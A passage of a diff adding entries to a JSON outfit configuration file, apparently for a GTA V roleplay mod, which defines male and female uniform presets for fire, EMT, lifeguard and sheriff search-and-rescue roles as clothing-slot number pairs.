+"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male LSCoFD EMT Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "76:4", +"UpperSkin": "87:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:2", +"Armor": "1:1", +"Parachute": "38:1" + }, + { +"Name": "Male LSCoFD EMT Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "75:4", +"UpperSkin": "93:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:2", +"Armor": "30:1", +"Parachute": "38:1" + }, + { +"Name": "Male LSCoFD EMT Pullover", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:15", +"UpperSkin": "87:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:2", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male LSCoFD T-Shirt", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "24:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "74:17", +"UpperSkin": "86:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "30:1", +"Parachute": "1:1" + }, + { +"Name": "Female LSCoFD EMT Class B ", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "27:3", +"UpperSkin": "102:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:1", +"Armor": "1:1", +"Parachute": "38:1" + }, + { +"Name": "Female LSCoFD EMT Class C ", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "26:3", +"UpperSkin": "110:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:1", +"Armor": "34:1", +"Parachute": "38:1" + }, + { +"Name": "Female LSCoFD EMT Pullover ", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:15", +"UpperSkin": "102:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female LSCoFD T-Shirt", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "225:23", +"UpperSkin": "110:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "34:1", +"Parachute": "49:1" + }, + { +"Name": "Male LSCoFD Winter Jacket", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "3:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "250:2", +"UpperSkin": "32:1", +"Decal": "59:2", +"UnderCoat": "16:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "127:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSCoFD Winter Jacket", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "6:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "258:2", +"UpperSkin": "37:1", +"Decal": "67:2", +"UnderCoat": "15:1", +"Pants": "42:4", +"Shoes": "53:1", +"Accessories": "97:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male LSCoFD EMT Jacket", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "152:4", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "13:1", +"Parachute": "49:1" + }, + { +"Name": "Female LSCoFD Jacket", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "149:4", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "12:1", +"Parachute": "1:1" + }, + { +"Name": "Male LSCoFD MVA PPE", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "139:2", +"Glasses": "22:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "316:2", +"UpperSkin": "91:1", +"Decal": "18:1", +"UnderCoat": "16:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female LSCoFD MVA PPE", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "138:2", +"Glasses": "26:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "327:2", +"UpperSkin": "110:1", +"Decal": "17:1", +"UnderCoat": "15:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male LSCoFD Water Rescue", +"Gender": "Male", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "90:5", +"Glasses": "22:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "74:17", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "69:1", +"Pants": "88:12", +"Shoes": "26:1", +"Accessories": "1:1", +"Armor": "9:5", +"Parachute": "1:1" + }, + { +"Name": "Female LSCoFD Water Rescue", +"Gender": "Female", +"Category": "SUP", +"Category2": "LSCoFD", +"Hat": "89:5", +"Glasses": "23:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "225:23", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "49:1", +"Pants": "90:12", +"Shoes": "26:1", +"Accessories": "1:1", +"Armor": "10:5", +"Parachute": "49:1" + }, + { +"Name": "Male BCFD Fireman Class A", +"Gender": "Male", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "119:5", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "26:4", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "39:2" + }, + { +"Name": "Male BCFD Fireman Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "76:6", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "26:4", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "39:2" + }, + { +"Name": "Male BCFD Fireman Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "75:6", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "26:4", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "39:2" + }, + { +"Name": "Male BCFD Fireman Pullover", +"Gender": "Male", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:10", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "26:4", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female BCFD Fireman Class A", +"Gender": "Female", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "19:5", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "42:4", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "39:2" + }, + { +"Name": "Female BCFD Fireman Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "27:6", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "42:4", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "39:2" + }, + { +"Name": "Female BCFD Fireman Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "26:6", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "42:4", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "39:2" + }, + { +"Name": "Female BCFD Fireman Pullover", +"Gender": "Female", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:10", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "42:4", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male BCFD EMT Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "76:5", +"UpperSkin": "87:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:3", +"Armor": "1:1", +"Parachute": "39:1" + }, + { +"Name": "Male BCFD EMT Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "75:5", +"UpperSkin": "93:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:3", +"Armor": "1:1", +"Parachute": "39:1" + }, + { +"Name": "Male BCFD EMT Pullover", +"Gender": "Male", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:9", +"UpperSkin": "87:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:3", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female BCFD EMT Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "27:5", +"UpperSkin": "102:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:3", +"Armor": "1:1", +"Parachute": "39:1" + }, + { +"Name": "Female BCFD EMT Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "26:5", +"UpperSkin": "110:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:3", +"Armor": "1:1", +"Parachute": "39:1" + }, + { +"Name": "Female BCFD EMT Pullover", +"Gender": "Female", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:9", +"UpperSkin": "102:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:3", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male BCFD T-Shirt", +"Gender": "Male", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "24:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "74:16", +"UpperSkin": "86:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "30:1", +"Parachute": "1:1" + }, + { +"Name": "Female BCFD EMT T-Shirt", +"Gender": "Female", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "225:24", +"UpperSkin": "110:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "34:1", +"Parachute": "49:1" + }, + { +"Name": "Male BCFD Winter Jacket", +"Gender": "Male", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "3:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "250:1", +"UpperSkin": "32:1", +"Decal": "59:1", +"UnderCoat": "16:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "127:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female BCFD Winter Jacket", +"Gender": "Female", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "6:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "258:1", +"UpperSkin": "37:1", +"Decal": "67:1", +"UnderCoat": "15:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "97:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male BCFD Jacket", +"Gender": "Male", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "152:5", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "13:3", +"Parachute": "49:1" + }, + { +"Name": "Female BCFD Jacket", +"Gender": "Female", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "149:5", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "12:3", +"Parachute": "1:1" + }, + { +"Name": "Male BCFD MVA PPE", +"Gender": "Male", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "46:8", +"Glasses": "22:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "315:2", +"UpperSkin": "91:1", +"Decal": "19:1", +"UnderCoat": "16:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female BCFD MVA PPE", +"Gender": "Female", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "45:8", +"Glasses": "26:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "326:2", +"UpperSkin": "110:1", +"Decal": "18:1", +"UnderCoat": "15:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male BCFD Water Rescue", +"Gender": "Male", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "90:6", +"Glasses": "22:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "74:16", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "69:1", +"Pants": "88:12", +"Shoes": "26:1", +"Accessories": "1:1", +"Armor": "9:4", +"Parachute": "1:1" + }, + { +"Name": "Female BCFD Water Rescue", +"Gender": "Female", +"Category": "SUP", +"Category2": "BCFD", +"Hat": "89:6", +"Glasses": "23:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "225:24", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "49:1", +"Pants": "90:12", +"Shoes": "26:1", +"Accessories": "1:1", +"Armor": "10:4", +"Parachute": "49:1" + }, + { +"Name": "Male Sanfire Brush Turnouts", +"Gender": "Male", +"Category": "SUP", +"Category2": "SanFire", +"Hat": "81:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "251:1", +"UpperSkin": "97:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "87:24", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female Sanfire Brush Turnouts", +"Gender": "Female", +"Category": "SUP", +"Category2": "SanFire", +"Hat": "80:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "259:1", +"UpperSkin": "112:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "90:24", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male SanFire Fireman Class A", +"Gender": "Male", +"Category": "SUP", +"Category2": "SanFire", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "216:8", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "39:5" + }, + { +"Name": "Male SanFire Fireman Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "SanFire", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "215:8", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "87:12", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "39:5" + }, + { +"Name": "Male SanFire Fireman Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "SanFire", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:8", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "87:12", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "39:5" + }, + { +"Name": "Male SanFire Fireman Pullover", +"Gender": "Male", +"Category": "SUP", +"Category2": "SanFire", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:11", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "87:12", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male SanFire LEO Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "SanFire", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "76:7", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "87:12", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "66:26" + }, + { +"Name": "Male SanFire LEO Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "SanFire", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "75:7", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "87:12", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "66:26" + }, + { +"Name": "Male SanFire Arson Investigator", +"Gender": "Male", +"Category": "SUP", +"Category2": "SanFire", +"Hat": "139:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "326:24", +"UpperSkin": "7:1", +"Decal": "1:1", +"UnderCoat": "29:3", +"Pants": "11:5", +"Shoes": "52:1", +"Accessories": "7:1", +"Armor": "1:1", +"Parachute": "69:1" + }, + { +"Name": "Female SanFire Arson Investigator", +"Gender": "Female", +"Category": "SUP", +"Category2": "SanFire", +"Hat": "138:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "319:24", +"UpperSkin": "105:1", +"Decal": "1:1", +"UnderCoat": "24:2", +"Pants": "4:5", +"Shoes": "26:1", +"Accessories": "7:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Sanfire Class A", +"Gender": "Female", +"Category": "SUP", +"Category2": "SanFire", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "19:7", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "42:4", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "39:5" + }, + { +"Name": "Female Sanfire Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "SanFire", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "27:7", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "90:12", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "39:5" + }, + { +"Name": "Female Sanfire Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "SanFire", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "26:7", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "90:12", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "39:5" + }, + { +"Name": "Female Sanfire Pullover", +"Gender": "Female", +"Category": "SUP", +"Category2": "SanFire", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:11", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "8:1", +"Pants": "90:12", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Sanfire LEO Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "SanFire", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "27:7", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "90:12", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "66:26" + }, + { +"Name": "Female Sanfire LEO Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "SanFire", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "26:7", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "90:12", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "66:26" + }, + { +"Name": "Male Lifeguard Bathsuit", +"Gender": "Male", +"Category": "SUP", +"Category2": "Lifeguard", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "16:1", +"UpperSkin": "16:1", +"Decal": "1:1", +"UnderCoat": "20:1", +"Pants": "7:4", +"Shoes": "35:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Lifeguard Swimsuit", +"Gender": "Female", +"Category": "SUP", +"Category2": "Lifeguard", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "12:4", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "19:1", +"Pants": "18:5", +"Shoes": "36:1", +"Accessories": "20:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Lifeguard Clothes", +"Gender": "Male", +"Category": "SUP", +"Category2": "Lifeguard", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "23:2", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "42:1", +"Pants": "7:4", +"Shoes": "35:1", +"Accessories": "16:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Lifeguard Clothes", +"Gender": "Female", +"Category": "SUP", +"Category2": "Lifeguard", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "24:1", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "11:4", +"Shoes": "36:1", +"Accessories": "20:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male ATV Patrol", +"Gender": "Male", +"Category": "SUP", +"Category2": "Lifeguard", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "23:1", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "42:1", +"Pants": "7:4", +"Shoes": "35:1", +"Accessories": "16:1", +"Armor": "45:1", +"Parachute": "1:1" + }, + { +"Name": "Female ATV Patrol", +"Gender": "Female", +"Category": "SUP", +"Category2": "Lifeguard", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "24:1", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "49:1", +"Pants": "11:4", +"Shoes": "36:1", +"Accessories": "1:1", +"Armor": "47:1", +"Parachute": "1:1" + }, + { +"Name": "Male Nautical Patrol", +"Gender": "Male", +"Category": "SUP", +"Category2": "Lifeguard", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "16:1", +"UpperSkin": "16:1", +"Decal": "1:1", +"UnderCoat": "69:1", +"Pants": "7:4", +"Shoes": "35:1", +"Accessories": "1:1", +"Armor": "45:1", +"Parachute": "1:1" + }, + { +"Name": "Female Nautical Patrol", +"Gender": "Female", +"Category": "SUP", +"Category2": "Lifeguard", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "12:4", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "19:1", +"Pants": "11:4", +"Shoes": "36:1", +"Accessories": "20:1", +"Armor": "48:1", +"Parachute": "1:1" + }, + { +"Name": "Male LSSD SAR Tech", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "90:7", +"Glasses": "24:1", +"Ear": "34:1", +"Watch": "0:0", +"Mask": "1:1", +"Top": "146:1", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "69:1", +"Pants": "88:8", +"Shoes": "26:1", +"Accessories": "1:1", +"Armor": "2:1", +"Parachute": "10:1" + }, + { +"Name": "Female LSSD SAR Tech", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "89:7", +"Glasses": "14:1", +"Ear": "17:1", +"Watch": "0:0", +"Mask": "1:1", +"Top": "144:1", +"UpperSkin": "216:1", +"Decal": "1:1", +"UnderCoat": "49:1", +"Pants": "91:8", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "2:1", +"Parachute": "10:1" + }, + { +"Name": "Male LSSD SAR Coveralls", +"Gender": "Male", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "90:7", +"Glasses": "0:0", +"Ear": "34:1", +"Watch": "0:0", +"Mask": "1:1", +"Top": "109:8", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "69:1", +"Pants": "65:2", +"Shoes": "26:1", +"Accessories": "21:2", +"Armor": "1:1", +"Parachute": "51:1" + }, + { +"Name": "Female LSSD SAR Coveralls", +"Gender": "Female", +"Category": "EUP", +"Category2": "LSSD", +"Hat": "89:7", +"Glasses": "14:1", +"Ear": "17:1", +"Watch": "0:0", +"Mask": "1:1", +"Top": "100:8", +"UpperSkin": "216:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "67:2", 